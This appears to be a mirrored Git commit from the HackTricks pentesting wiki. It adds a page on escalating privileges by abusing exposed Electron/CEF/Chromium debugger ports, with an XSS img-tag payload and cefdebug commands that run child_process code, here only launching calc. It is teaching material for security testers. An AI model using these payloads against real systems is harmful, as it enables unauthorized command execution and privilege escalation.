Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-25 06:00:40 +00:00
Code Issues Projects Releases Packages Wiki Activity

GitBook: [master] 378 pages modified

Browse source
This commit is contained in:
CPol 2020-09-20 22:47:34 +00:00 committed by gitbook-bot
parent 3f541f3133
commit 0f8cae6f14
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
4 changed files with 35 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

1
SUMMARY.md
View file

@ -20,6 +20,7 @@
* [Checklist - Linux Privilege Escalation](linux-unix/linux-privilege-escalation-checklist.md)
* [Linux Privilege Escalation](linux-unix/privilege-escalation/README.md)
* [electron/CEF/chromium debugger abuse](linux-unix/privilege-escalation/electron-cef-chromium-debugger-abuse.md)
* [Escaping from a Docker container](linux-unix/privilege-escalation/escaping-from-a-docker-container.md)
* [Escaping from restricted shells - Jails](linux-unix/privilege-escalation/escaping-from-limited-bash.md)
* [Cisco - vmanage](linux-unix/privilege-escalation/cisco-vmanage.md)

1
linux-unix/privilege-escalation/README.md
View file

@ -201,6 +201,7 @@ ps -ef
top -n 1
```
Always check for possible [**electron/cef/chromium debuggers** running, you could abuse it to escalate privileges](electron-cef-chromium-debugger-abuse.md). **Linpeas** detect those by checking the `--inspect` parameter inside the command line of the process.
Also **check your privileges over the processes binaries**, maybe you can overwrite someone.
### Process monitoring

31
linux-unix/privilege-escalation/electron-cef-chromium-debugger-abuse.md Normal file
View file

@ -0,0 +1,31 @@
# electron/CEF/chromium debugger abuse
If you find any process with **electron, cef or chromium debugger running** and listening to a port you should try to make the **debugger execute arbitrary commands**.
Abusing this behaviour you **could be able to escalate privileges**.
The abuse of this vulnerability remotely could be as easy as injecting via XSS this line of JS:
```markup
<img src="http://localhost:40000/json/new/?javascript:require('child_process').spawnSync('calc.exe')">
```
But obviously the exploitation will be **much easier locally**, as you can use a tool such as: [**https://github.com/taviso/cefdebug**](https://github.com/taviso/cefdebug)\*\*\*\*
```bash
#List possible vulnerable sockets
./cefdebug.exe
#Check if possibly vulnerable
./cefdebug.exe --url ws://127.0.0.1:3585/5a9e3209-3983-41fa-b0ab-e739afc8628a --code "process.version"
#Exploit it
./cefdebug.exe --url ws://127.0.0.1:3585/5a9e3209-3983-41fa-b0ab-e739afc8628a --code "process.mainModule.require('child_process').exec('calc')"
```
## References
* [https://www.youtube.com/watch?v=iwR746pfTEc&t=6345s](https://www.youtube.com/watch?v=iwR746pfTEc&t=6345s)
* [https://github.com/taviso/cefdebug](https://github.com/taviso/cefdebug)
* [https://iwantmore.pizza/posts/cve-2019-1414.html](https://iwantmore.pizza/posts/cve-2019-1414.html)
* [https://bugs.chromium.org/p/project-zero/issues/detail?id=773](https://bugs.chromium.org/p/project-zero/issues/detail?id=773)
* [https://bugs.chromium.org/p/project-zero/issues/detail?id=1742](https://bugs.chromium.org/p/project-zero/issues/detail?id=1742)
* [https://bugs.chromium.org/p/project-zero/issues/detail?id=1944](https://bugs.chromium.org/p/project-zero/issues/detail?id=1944)

2
windows/windows-local-privilege-escalation/README.md
View file

@ -404,6 +404,8 @@ Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "sv
Get-Process | where {$_.ProcessName -notlike "svchost*"} | ft ProcessName, Id
```
Always check for possible [**electron/cef/chromium debuggers** running, you could abuse it to escalate privileges](../../linux-unix/privilege-escalation/electron-cef-chromium-debugger-abuse.md).
#### Checking permissions of the processes binaries
```bash